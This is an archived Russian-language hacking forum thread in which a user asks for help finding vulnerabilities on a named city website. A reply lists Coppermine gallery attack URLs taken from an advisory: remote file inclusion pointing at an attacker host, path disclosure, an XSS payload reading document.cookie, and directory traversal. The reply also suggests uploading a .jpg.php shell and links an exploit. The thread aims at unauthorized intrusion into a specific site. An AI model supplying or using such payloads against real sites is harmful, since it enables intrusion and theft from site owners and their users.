PDA

Просмотр полной версии : Вроде все испробовал =(


[6][P][A][T]
06.06.2006, 16:43
Плиз помогите с поиском уязвимостей на
www.strinfo.ru
Вроде уже все испробовал =(

Зарание примного благодарен =)

KillAll
17.06.2006, 00:03
А платить кто будет?

Sn@k3
17.06.2006, 01:22
думаю е детская защита (

zyl
17.06.2006, 11:45
Вообщем, попробуй зайти на страницу фотогалерея, там внизу страницы имеется надпись: Powered by Coppermine Photo Gallery. У этого скрипта есть несколько багов вот они:
1 PHP including:

http://localhost/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://at tacker.com
http://localhost/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/ma ze/theme.php?THEME_DIR=http://attacker.com

2. Раскрытие инсталляционного пути:
http://localhost/nuke72/modules/coppermine/phpinfo.php
http://localhost/nuke72/modules/coppermine/addpic.php
ht tp://localhost/nuke72/modules/coppermine/config.php
http://localhost/nuke72/modules/coppermine/db_input.php
http://localhost/nuke72/modules/coppermine/displayecard.php
http://localhost/nuke72/modules/coppermine/ecard.php
http://localhost/nuke72/modules/coppermine/include/crop.inc.php

3. XSS:
http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=fo obar">[xss
code here]
http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>

4. Просмотр структуры каталогов (удаленный авторизованный пользователь с PHP-Nuke административными привилегиями):
http://localhost/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../..

Также сообщается, что удаленный авторизованный пользователь с административными привилегиями PHP-Nuke может выполнить произвольные команды оболочки, представляя специально обработанные 'impath' и 'jpeg_qual' параметры конфигурации. Пример см. в источнике сообщения.

Можешь попробывать загрузить файл с расширения .jpg.php, вместо картинки!

Информация предоставлена по данным SecurityLab

zyl
17.06.2006, 11:50
Но правда это на локальной машине, можеть залить скрипт с офицального сайта и сам что-нибудь обнаружить. Вот там форум вроде от PHP Nuke, тобишь phpBB 2.x.x., но за последнее не ручаюсь!

zyl
17.06.2006, 22:22
Вот я тебе эксплоит подыскал:
_http://www.securitylab.ru/poc/extra/222633.php?phrase_id=66579
Хотя вряд ли он заработает, он для старой версии(07 января, 2003)!

Sn@k3
18.06.2006, 01:30
zyl, что ты тут выложил может и не работать, так как это всё на необъезжанных дфигах, т.е. только что устнавленных, а если админ руку приложил

zyl
18.06.2006, 11:38
Ну насчёт эксплоита ты наверное прав! Это же ведь городская страничка и вряд ли админ что-нибудь своего не прилепит или заплатки не поставит! А все баги это же локалка, опять вряд ли обычный пользователь будет иметь права на серьёзные вещи.
Хотя я зря так "старался" автор темы уже наверное забыл, что оставлял сообщение!